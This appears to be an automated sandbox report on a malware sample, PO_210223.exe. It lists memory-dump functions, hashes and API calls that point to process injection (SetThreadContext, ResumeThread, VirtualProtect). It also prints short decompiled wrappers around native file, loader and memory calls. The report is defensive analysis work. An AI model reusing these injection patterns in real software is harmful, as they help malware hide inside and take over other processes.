Source File: 00000000.00000002.687499962.0000000009AB0000.00000040.00000001.sdmp, Offset: 09AB0000, based on PE: false

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 70c0c42937f9087f33d36410eb8f16ca9342fbe785aae55bff67752db473fa2a
Instruction ID: 1646109ea87d367ff602b0a2b846ec597735af16083fb93afa76916c81f0fe13
Opcode Fuzzy Hash: 70c0c42937f9087f33d36410eb8f16ca9342fbe785aae55bff67752db473fa2a
Instruction Fuzzy Hash: 163197B9D042589FCF10CFA9D880AEEFBB5FB49310F10902AE814BB210D775A906CF64

Uniqueness

Uniqueness Score: -1.00%

Function 01287F60, Relevance: 1.6, APIs: 1, Instructions: 97memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 0128800F

Memory Dump Source

Source File: 00000000.00000002.680207417.0000000001280000.00000040.00000001.sdmp, Offset: 01280000, based on PE: false

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: a6f344890a811c42e155213943ea7e6c8604fa5be09461e71745a5561e5ef28c
Instruction ID: 22d12e7dcb40f2b4619ffafb67738b39e3f20a676a7155ef41838f0ba8869dcb
Opcode Fuzzy Hash: a6f344890a811c42e155213943ea7e6c8604fa5be09461e71745a5561e5ef28c
Instruction Fuzzy Hash: 223198B9D052589FCB10CFA9D880AEEFBF0EB19310F14906AE854B7210D775A946CF64

Uniqueness

Uniqueness Score: -1.00%

Function 09AB7838, Relevance: 1.6, APIs: 1, Instructions: 94threadinjectionCOMMON

Download Yara Rule

APIs

SetThreadContext.KERNELBASE(?,?), ref: 09AB78E7

Memory Dump Source

Source File: 00000000.00000002.687499962.0000000009AB0000.00000040.00000001.sdmp, Offset: 09AB0000, based on PE: false

Similarity

API ID: ContextThread
String ID:
API String ID: 1591575202-0
Opcode ID: bd489ef35bf9ac9c488a8cbfadedf17701f401fafc891bf92e4808a03f293c7d
Instruction ID: 3bc18db315f1fa1a9553e5d089233bbc1d531508e4acf7c1e7399667f4da3017
Opcode Fuzzy Hash: bd489ef35bf9ac9c488a8cbfadedf17701f401fafc891bf92e4808a03f293c7d
Instruction Fuzzy Hash: 6031ACB5D012589FDB10CFE9D884AEEBBF5BF49314F14802AE418B7250D778A945CF94

Uniqueness

Uniqueness Score: -1.00%

Function 01287F68, Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 0128800F

Memory Dump Source

Source File: 00000000.00000002.680207417.0000000001280000.00000040.00000001.sdmp, Offset: 01280000, based on PE: false

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 0d40d6981fdf8c923ffb052e115f3e7c99b32d2e6ea083c22f463402cec6edae
Instruction ID: da46871ea658a935722cceb2aa1ff9f7c1e6891f3dbab3f6e39aaeeb91fe78e7
Opcode Fuzzy Hash: 0d40d6981fdf8c923ffb052e115f3e7c99b32d2e6ea083c22f463402cec6edae
Instruction Fuzzy Hash: 3D3197B9D052589FCF10CFA9D880AEEFBF0BB19310F14902AE818B7210D775A945CF64

Uniqueness

Uniqueness Score: -1.00%

Function 09ABB4E8, Relevance: 1.6, APIs: 1, Instructions: 85windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,?,?,?), ref: 09ABB583

Memory Dump Source

Source File: 00000000.00000002.687499962.0000000009AB0000.00000040.00000001.sdmp, Offset: 09AB0000, based on PE: false

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 3081f1fda7111aae1090c9a2142edbc4a9cc686276a89a343a7c4961972ab09e
Instruction ID: 0b3f1122a9782166efe70b66fb14fe5acf0627ded1ac3810bba4dd488d27b161
Opcode Fuzzy Hash: 3081f1fda7111aae1090c9a2142edbc4a9cc686276a89a343a7c4961972ab09e
Instruction Fuzzy Hash: 483188B9D002589FCB10CF99D980ADEFBF4EB19310F14901AE819BB310D375A945CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 09AB7748, Relevance: 1.6, APIs: 1, Instructions: 73threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE(?), ref: 09AB77C6

Memory Dump Source

Source File: 00000000.00000002.687499962.0000000009AB0000.00000040.00000001.sdmp, Offset: 09AB0000, based on PE: false

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 83d65535b77350be3bca177d75e32bb1d5abee9e6e633b57730410b23652fc7c
Instruction ID: 8402c183fa6934b92f52c8015564c81cd8408c786fece4bb6ba7c26d77b461a5
Opcode Fuzzy Hash: 83d65535b77350be3bca177d75e32bb1d5abee9e6e633b57730410b23652fc7c
Instruction Fuzzy Hash: D631A9B5D052589FCF14CFA9D880AEEFBF4AB49314F14842AE815B7710CB74A941CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 0101D3EC, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.679661095.000000000101D000.00000040.00000001.sdmp, Offset: 0101D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32b5f60018db03b10f25de0b5863f3dc3bf9c7049abb202a9db6f08a7dcff398
Instruction ID: 3bfd930db19abf4d649c917dfcf073d9d98e4b01b4b59c5faae638e214d09738
Opcode Fuzzy Hash: 32b5f60018db03b10f25de0b5863f3dc3bf9c7049abb202a9db6f08a7dcff398
Instruction Fuzzy Hash: 99212B71544240EFDB05DF54D8C4BA7BBA5FB88324F24C5A9D9490B20BC73AE446C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 0102D1D4, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.679691739.000000000102D000.00000040.00000001.sdmp, Offset: 0102D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0bf76ef97dc96c5967be8087b8d789f11e52d8e49cc251be0687cb13565a0676
Instruction ID: a7360e8e6c407e280f011cd5c229fce3ba7349b579297a653c4ea152140bd1d1
Opcode Fuzzy Hash: 0bf76ef97dc96c5967be8087b8d789f11e52d8e49cc251be0687cb13565a0676
Instruction Fuzzy Hash: 20213B71504240EFDB05CF94D9C0B26BBA5FB99324F24C5ADD8894B346C736DC4ACB61

Uniqueness

Uniqueness Score: -1.00%

Function 0102D01C, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.679691739.000000000102D000.00000040.00000001.sdmp, Offset: 0102D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25a90b6457e41276d8b8de0ebc855a7e5285e9054263c32e580c8e53c96b76e9
Instruction ID: 7099f29266b4faf214740ff07349bcc1e03528d1be76c94cb88b8a04dc0b81a2
Opcode Fuzzy Hash: 25a90b6457e41276d8b8de0ebc855a7e5285e9054263c32e580c8e53c96b76e9
Instruction Fuzzy Hash: 0B212571608240DFCB15CF94D8C0B26BBA5FB88354F20C5A9E9894B256C73ADC07CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0102D006, Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.679691739.000000000102D000.00000040.00000001.sdmp, Offset: 0102D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b88efa71303aa7c5b626387456684d08c40345d3e563e5d25bbd31b3d40f0d8
Instruction ID: 39cda9c3595ce06d8e221f0f7b5994ab830a7c084947075fb59b4909551f6811
Opcode Fuzzy Hash: 7b88efa71303aa7c5b626387456684d08c40345d3e563e5d25bbd31b3d40f0d8
Instruction Fuzzy Hash: 772180754083809FCB12CF64D9D4B11BFB1EF46214F28C5DAD8858F267C33A9856CB62

Uniqueness

Uniqueness Score: -1.00%

Function 0101D3E7, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.679661095.000000000101D000.00000040.00000001.sdmp, Offset: 0101D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15e00ab0180662b097a36b170ee5e0122ef9b813bbc53ef17b167e6fd8fb8d96
Instruction ID: bc1b235a45992919a2b91b6f4d36a67045407576e274f837a55c31a79d691090
Opcode Fuzzy Hash: 15e00ab0180662b097a36b170ee5e0122ef9b813bbc53ef17b167e6fd8fb8d96
Instruction Fuzzy Hash: 9B11E172444280CFCB06CF44D5C4B56BFB2FB88324F24C6A9D8490B61AC33AE456CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 0102D1CF, Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.679691739.000000000102D000.00000040.00000001.sdmp, Offset: 0102D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d36124553d90c539148c45a8a93ecca56ad8a74831c1bc612bfc5b4ddcdf7be
Instruction ID: facbf3b95da9d62cbaab37df202e356449dff2c6626a4529b123b1b653d239b4
Opcode Fuzzy Hash: 7d36124553d90c539148c45a8a93ecca56ad8a74831c1bc612bfc5b4ddcdf7be
Instruction Fuzzy Hash: 7911B875904280DFDB42CF54C5C4B15FBB1FB85224F28C6AAD8898B656C33AD84ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 0101D75D, Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.679661095.000000000101D000.00000040.00000001.sdmp, Offset: 0101D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7533e337567e2f0915bd26a96c167b34e93a25ee732040520a9effb29c53bd60
Instruction ID: e9ce2f8b7c2825be76a681f0d40eacdf2268f85694aa956c74271393eb5d8bc8
Opcode Fuzzy Hash: 7533e337567e2f0915bd26a96c167b34e93a25ee732040520a9effb29c53bd60
Instruction Fuzzy Hash: 8E01F771008380AEE7104E5ADC88B6AFBD8FF45624F08845AED440B24AE37C9844C7B1

Uniqueness

Uniqueness Score: -1.00%

Function 0101D75C, Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.679661095.000000000101D000.00000040.00000001.sdmp, Offset: 0101D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1722675ccefb879439e1152f8ac2f4c6597cbdb148466afab5c15bacfd9087a6
Instruction ID: 05af009de7d75210ec6841811d08c7c89e38e03d1981f893d7a7e9944d3360b4
Opcode Fuzzy Hash: 1722675ccefb879439e1152f8ac2f4c6597cbdb148466afab5c15bacfd9087a6
Instruction Fuzzy Hash: 51F062714042849EEB618E1ACCC8B62FFE8EF41734F18C55AED585B28AD3799844CBB1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 01285420, Relevance: 1.4, Strings: 1, Instructions: 169COMMON

Download Yara Rule

Strings

;gau, xrefs: 01285603

Memory Dump Source

Source File: 00000000.00000002.680207417.0000000001280000.00000040.00000001.sdmp, Offset: 01280000, based on PE: false

Similarity

API ID:
String ID: ;gau
API String ID: 0-394240588
Opcode ID: a92fa5ae7dcd23c8e8066ec9788931ea336b0fc59f0b16c7eec0b09b63ec25d0
Instruction ID: b7043bf7d2704f241fc75bf368894fa484878a2b7f64151e9830638c2a5d8e49
Opcode Fuzzy Hash: a92fa5ae7dcd23c8e8066ec9788931ea336b0fc59f0b16c7eec0b09b63ec25d0
Instruction Fuzzy Hash: F5610574E2524ACFCB04CFAAC5815DEFBF2FF89210F24942AD815B7254D3749A428F65

Uniqueness

Uniqueness Score: -1.00%

Function 01285430, Relevance: 1.4, Strings: 1, Instructions: 167COMMON

Download Yara Rule

Strings

;gau, xrefs: 01285603

Memory Dump Source

Source File: 00000000.00000002.680207417.0000000001280000.00000040.00000001.sdmp, Offset: 01280000, based on PE: false

Similarity

API ID:
String ID: ;gau
API String ID: 0-394240588
Opcode ID: a844fde56364ffffdcc4957b819419106fd3290702a9ac7dbd13c79f781ebebd
Instruction ID: 90df480f81994445e06c1ec9e1821e0e9704d97895b91a068b21d9ed2c52aea3
Opcode Fuzzy Hash: a844fde56364ffffdcc4957b819419106fd3290702a9ac7dbd13c79f781ebebd
Instruction Fuzzy Hash: 10710474E26219DFCB04CFAAD5819DEFBF2FF88210F24942AD805B7254D3B49A418F64

Uniqueness

Uniqueness Score: -1.00%

Function 01284E60, Relevance: 1.4, Strings: 1, Instructions: 163COMMON

Download Yara Rule

Strings

^0, xrefs: 01285021

Memory Dump Source

Source File: 00000000.00000002.680207417.0000000001280000.00000040.00000001.sdmp, Offset: 01280000, based on PE: false

Similarity

API ID:
String ID: ^0
API String ID: 0-1283503254
Opcode ID: ab5e6000464e35b136f6662f4107a50f9b67af658757bfd5b4159008511608d3
Instruction ID: d2f9b4677909b40d296b2f70a17271e15c7ff58bd995cf8c4d58666441aac3bf
Opcode Fuzzy Hash: ab5e6000464e35b136f6662f4107a50f9b67af658757bfd5b4159008511608d3
Instruction Fuzzy Hash: A9612970D2525ADFCB04EFAAD5816EEBBF1BF59300F14842AD524B7284D7789642CF90

Uniqueness

Uniqueness Score: -1.00%

Function 01281292, Relevance: .3, Instructions: 251COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.680207417.0000000001280000.00000040.00000001.sdmp, Offset: 01280000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 68487f43b753a28250fc9d9960beea3b6016914427c76207aecd63c386a84bff
Instruction ID: e185ff8c70058de6701408b3a0a66862ca46862302fb7a854bbf2dc9d231b66e
Opcode Fuzzy Hash: 68487f43b753a28250fc9d9960beea3b6016914427c76207aecd63c386a84bff
Instruction Fuzzy Hash: 15B11970E2121ADFDB54DFA4D8809DEBBB2FF88300F108665E415AB358DB74A946CF91

Uniqueness

Uniqueness Score: -1.00%

Function 01283FA8, Relevance: .2, Instructions: 202COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.680207417.0000000001280000.00000040.00000001.sdmp, Offset: 01280000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 04a2b22db7da8d68a1d9e56fe8377b623cf7c8ac8082f0838676ab532db584ef
Instruction ID: 04367f9021d5817493b8df07973e457f6e5f0ba31e13f1ebe8fba0945895cbb3
Opcode Fuzzy Hash: 04a2b22db7da8d68a1d9e56fe8377b623cf7c8ac8082f0838676ab532db584ef
Instruction Fuzzy Hash: 50911274A2625ACFCB04DFA9C5859AEFBF1FF88310F248559D415EB254D370AA06CF90

Uniqueness

Uniqueness Score: -1.00%

Function 01283F99, Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.680207417.0000000001280000.00000040.00000001.sdmp, Offset: 01280000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f40ea910d4f1f0e16d3faf7bc6cf5b4246bb5e33de6ed613212e78e86ff7031
Instruction ID: b6b4bf7148e8b3d4f8beffcac646beefc9a5346874f15451c32064bef773d412
Opcode Fuzzy Hash: 7f40ea910d4f1f0e16d3faf7bc6cf5b4246bb5e33de6ed613212e78e86ff7031
Instruction Fuzzy Hash: DE912534A2625ACFCB04DFA9C58599EFBF1FF88310B14856AD415EB354D370AA06CF90

Uniqueness

Uniqueness Score: -1.00%

Function 012851D0, Relevance: .1, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.680207417.0000000001280000.00000040.00000001.sdmp, Offset: 01280000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a25f2515851ec3bb0f0fbc5867fc2827e8a1fd954913716248ba533b6f649c3b
Instruction ID: 388144acef6b605ef4000ccfef9dbcf137f981a2e1cb4b7f6005dba8079a1594
Opcode Fuzzy Hash: a25f2515851ec3bb0f0fbc5867fc2827e8a1fd954913716248ba533b6f649c3b
Instruction Fuzzy Hash: 15511770E1520A8FCB44CFAAC4825EEFBF2BF89310F24D06AD415AB254E7749642CF94

Uniqueness

Uniqueness Score: -1.00%

Function 012851E0, Relevance: .1, Instructions: 119COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.680207417.0000000001280000.00000040.00000001.sdmp, Offset: 01280000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d53a78084dbfa53a7c5ebd4b4441b6e0721c290f201d4c35c679497ba6c2832a
Instruction ID: d74f1fb498f44f704c74b40b43def881337d0f030416fe775364ecf3eb0eece7
Opcode Fuzzy Hash: d53a78084dbfa53a7c5ebd4b4441b6e0721c290f201d4c35c679497ba6c2832a
Instruction Fuzzy Hash: F1512870E1520A9FCB44DFAAC5815EEFBF2BF88300F24D06AD415AB258E7749642CF94

Uniqueness

Uniqueness Score: -1.00%

Function 01285840, Relevance: .1, Instructions: 113COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.680207417.0000000001280000.00000040.00000001.sdmp, Offset: 01280000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3fdc6d51920ae354a076e7d56aa2bcdbe57e020a614386e4f495d04b8b1b60de
Instruction ID: b44f6eb6f09e826d8fcd3ffc712a1c3b1e7b48541eae58e82a49fcf27a968f8b
Opcode Fuzzy Hash: 3fdc6d51920ae354a076e7d56aa2bcdbe57e020a614386e4f495d04b8b1b60de
Instruction Fuzzy Hash: D3417C71E156198BEB28CF6B9D4429EFBF3BFC9300F14C1BA854CA6264EB3409468F11

Uniqueness

Uniqueness Score: -1.00%

Function 01285698, Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.680207417.0000000001280000.00000040.00000001.sdmp, Offset: 01280000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 20188e7dbdd2800abfebac7c7ad9308572ade5dc7e4d23c2c981ef79a227c221
Instruction ID: d76f31573ab1e15325c91fad29277c2e6dae59f62a6f28bf12b61395e1c13390
Opcode Fuzzy Hash: 20188e7dbdd2800abfebac7c7ad9308572ade5dc7e4d23c2c981ef79a227c221
Instruction Fuzzy Hash: 7241E3B0E1521ADFCB08DFAAC5815AEFBF2BF89310F24C56AC504A7254E7349A418F94

Uniqueness

Uniqueness Score: -1.00%

Function 09AB0040, Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.687499962.0000000009AB0000.00000040.00000001.sdmp, Offset: 09AB0000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9592c8e8f9e71819167b34dc03c5739f8a43da752a5f59a4b16aebe35d1c19c2
Instruction ID: 101598c68ec390d2eaa3d745ae4c544cdf6f14a6c6f7206977755420208f01b0
Opcode Fuzzy Hash: 9592c8e8f9e71819167b34dc03c5739f8a43da752a5f59a4b16aebe35d1c19c2
Instruction Fuzzy Hash: 604112B1E056588BEB5CCF6B8D4078AFAF7AFC8200F14D1BA890DAA219EB7005458F15

Uniqueness

Uniqueness Score: -1.00%

Function 012856A8, Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.680207417.0000000001280000.00000040.00000001.sdmp, Offset: 01280000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dddb6c3badf2ea5d6390410ec083a992904df2817e553f3660cd4963a72f29f8
Instruction ID: dbe0053e4093c13a1012838ece4fb99d850e95ad60f0be3170232c130cab4fa4
Opcode Fuzzy Hash: dddb6c3badf2ea5d6390410ec083a992904df2817e553f3660cd4963a72f29f8
Instruction Fuzzy Hash: F341F6B0E1520ADFCB08DFAAC5815AEFBF2BF88300F24C56AC504B7254E7349A418F94

Uniqueness

Uniqueness Score: -1.00%

Function 012804D0, Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.680207417.0000000001280000.00000040.00000001.sdmp, Offset: 01280000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f3835e16ec8cb6be1accb2f70b80a60cd7c5e5c68fe2efab8d4350feae55ea3
Instruction ID: 1149beee02a8c03f419431e121720ea90e9ca6da197a3ec1b4837aecbe30c838
Opcode Fuzzy Hash: 6f3835e16ec8cb6be1accb2f70b80a60cd7c5e5c68fe2efab8d4350feae55ea3
Instruction Fuzzy Hash: 22212F71E056188BDB19CFABD84069EFBF3BFC9200F19C0B6D948A6264DB3405468F25

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: PO_210223.exe PID: 1868 Parent PID: 6976 PO_210223.exeCOMMON

Executed Functions

Function 00419E00, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00419E00(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E0041A950(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t6 =  &_a32; // 0x414d32
				_t12 =  &_a8; // 0x414d32
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
				return _t18;
			}

0x00419e03
0x00419e0f
0x00419e17
0x00419e22
0x00419e3d
0x00419e45
0x00419e49

APIs

NtReadFile.NTDLL(2MA,5EB6522D,FFFFFFFF,004149F1,?,?,2MA,?,004149F1,FFFFFFFF,5EB6522D,00414D32,?,00000000), ref: 00419E45

Strings

2MA, xrefs: 00419E22, 00419E30
2MA, xrefs: 00419E3D, 00419E44

Memory Dump Source

Source File: 00000009.00000002.715093547.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FileRead
String ID: 2MA$2MA
API String ID: 2738559852-947276439
Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction ID: e2eeafcdabc96c90d19f56ab9cfe9238ee24689222a5818d11d4b5cf4f7c0d6d
Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction Fuzzy Hash: 90F0B7B2210208AFCB14DF89DC91EEB77ADEF8C754F158649BE1D97241D630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00419D4A, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E00419D4A(signed int __ebx, intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, char _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				signed int _v69;
				long _t23;
				void* _t34;

				asm("adc esp, ebp");
				_v69 = _v69 ^ __ebx;
				asm("adc dword [ebp-0x75], 0x8458bec");
				_t17 = _a4;
				_t5 = _t17 + 0xc40; // 0xc40
				E0041A950(_t34, _a4, _t5,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t13 =  &_a20; // 0x414b77
				_t23 = NtCreateFile(_a8, _a12, _a16,  *_t13, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t23;
			}

0x00419d4a
0x00419d4c
0x00419d4f
0x00419d53
0x00419d5f
0x00419d67
0x00419d89
0x00419d9d
0x00419da1

APIs

NtCreateFile.NTDLL(00000060,00409CC3,?,wKA,00409CC3,FFFFFFFF,?,?,FFFFFFFF,00409CC3,00414B77,?,00409CC3,00000060,00000000,00000000), ref: 00419D9D

Strings

wKA, xrefs: 00419D89, 00419D94

Memory Dump Source

Source File: 00000009.00000002.715093547.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID: wKA
API String ID: 823142352-3165208591
Opcode ID: 517915791e4fd7814d0cafe83e0537ba85618ec02e2c1abbdfe148ee26ed9052
Instruction ID: 19c33e70524f0efa7ca0769a7a409f4feae1ca97253c438cdff02ba673e97430
Opcode Fuzzy Hash: 517915791e4fd7814d0cafe83e0537ba85618ec02e2c1abbdfe148ee26ed9052
Instruction Fuzzy Hash: 1001EFB2604108AFCB58CF98CC95EEB77A9AF8C354F15824DFA09A7241C634E811CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00419D50, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00419D50(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, char _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E0041A950(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t11 =  &_a20; // 0x414b77
				_t21 = NtCreateFile(_a8, _a12, _a16,  *_t11, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}

0x00419d5f
0x00419d67
0x00419d89
0x00419d9d
0x00419da1

APIs

NtCreateFile.NTDLL(00000060,00409CC3,?,wKA,00409CC3,FFFFFFFF,?,?,FFFFFFFF,00409CC3,00414B77,?,00409CC3,00000060,00000000,00000000), ref: 00419D9D

Strings

wKA, xrefs: 00419D89, 00419D94

Memory Dump Source

Source File: 00000009.00000002.715093547.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CreateFile
String ID: wKA
API String ID: 823142352-3165208591
Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction ID: 0d977cd1f4fbd36c9bd444ef8f6a04c43f7f15de33bda2cf86b45a3658e1eede
Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
Instruction Fuzzy Hash: BFF0BDB2211208AFCB08CF89DC95EEB77ADAF8C754F158248BA1D97241C630E8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040ACC0, Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040ACC0(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E0041C640( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041CA60(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041CCE0( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E0041AE90(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}

0x0040acdc
0x0040acdf
0x0040ace4
0x0040ace9
0x0040acf3
0x0040acf8
0x0040acfb
0x0040acfd
0x0040ad05
0x0040ad0a
0x0040ad0a
0x0040ad11
0x0040ad19
0x0040ad1c
0x0040ad1e
0x0040ad32
0x00000000
0x0040ad34
0x0040ad3a
0x0040acee
0x0040acee
0x0040acee

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD32

Memory Dump Source

Source File: 00000009.00000002.715093547.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
Instruction ID: 8d9c8c5cc187846e167d7fc499b748faaade23025a89af1130ee390205ce80a6
Opcode Fuzzy Hash: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
Instruction Fuzzy Hash: C40152B5D4020DA7DB10DBE5DC42FDEB7789F14308F0041AAE908A7281F634EB54C795

Uniqueness

Uniqueness Score: -1.00%

Function 00419F2A, Relevance: 1.5, APIs: 1, Instructions: 32
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E00419F2A(void* __eax, intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t16;
				void* _t23;

				asm("adc [ebp-0x76], dl");
				asm("rcl dword [ebp-0x75], 1");
				_t12 = _a4;
				_t3 = _t12 + 0xc60; // 0xca0
				E0041A950(_t23, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t16 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t16;
			}

0x00419f2c
0x00419f2f
0x00419f33
0x00419f3f
0x00419f47
0x00419f69
0x00419f6d

APIs

NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AB24,?,00000000,?,00003000,00000040,00000000,00000000,00409CC3), ref: 00419F69

Memory Dump Source

Source File: 00000009.00000002.715093547.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 699a5af382d5f23e7e71cba4d5a1ab78155c5736a05abcfe2e97bee9ed49de0c
Instruction ID: e1a713d15361b04bd98abd6dc1df569f05da0cd60e7614d018675cd7def08f20
Opcode Fuzzy Hash: 699a5af382d5f23e7e71cba4d5a1ab78155c5736a05abcfe2e97bee9ed49de0c
Instruction Fuzzy Hash: D9F05EB2200108AFCB14CF98CC81EEB77B9AF88354F15854DF919A7242C630E811CBA0

Uniqueness

Uniqueness Score: -1.00%

